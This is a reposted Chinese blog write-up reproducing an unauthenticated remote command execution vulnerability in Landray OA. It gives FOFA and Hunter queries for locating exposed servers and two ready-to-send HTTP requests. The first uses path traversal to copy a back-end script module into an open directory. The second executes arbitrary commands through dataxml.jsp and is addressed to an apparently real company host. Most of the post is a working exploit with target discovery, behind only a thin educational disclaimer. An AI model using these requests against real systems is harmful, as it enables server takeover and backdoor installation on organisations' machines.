0


【漏洞复现】蓝凌OA——远程命令执行

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录


漏洞描述

蓝凌OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织的内外协作与管理,支撑商业模式创新与转型发展。由于蓝凌OA代码功能模块设计缺陷问题,攻击者可以利用文件复制的方式,将后台脚本功能模块文件复制到无需权限认证的目录下,导致未经过身份认证的攻击者利用后台脚本执行模块,远程命令执行,写入后门文件并获取服务器权限。

漏洞复现

1)信息收集
fofa:

  1. app="Landray-OA系统"

hunter:

  1. app.name="Landray 蓝凌OA"

在这里插入图片描述
我们永远无法叫醒一个装睡的人 。
在这里插入图片描述
2)构造数据包

  1. POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
  2. Host: ip
  3. Accept:application/json,text/javascript,*/*;q=0.01
  4. Accept-Encoding:gzip,deflate
  5. Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
  6. Connection:close
  7. Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
  8. User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
  9. X-Requested-With:XMLHttpRequest
  10. Content-Length:395------WebKitFormBoundaryL7ILSpOdIhIIvL51
  11. Content-Disposition:form-data;name="method"
  12. replaceExtend
  13. ------WebKitFormBoundaryL7ILSpOdIhIIvL51
  14. Content-Disposition:form-data;name="extendId"../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51
  15. Content-Disposition:form-data;name="folderName"../../../ekp/sys/common
  16. ------WebKitFormBoundaryL7ILSpOdIhIIvL51--

在这里插入图片描述

  1. POST /resource/help/km/review/dataxml.jsp HTTP/1.1
  2. Host: cfoa.cfpharmtech.com:9081
  3. User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36
  4. Connection:close
  5. Content-Length:17392
  6. Content-Type:application/x-www-form-urlencoded
  7. s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test

在这里插入图片描述
将shell替换成命令即可


本文转载自: https://blog.csdn.net/LongL_GuYu/article/details/140599529
版权归原作者 Long._.L 所有, 如有侵权,请联系我们删除。

“【漏洞复现】蓝凌OA——远程命令执行”的评论:

还没有评论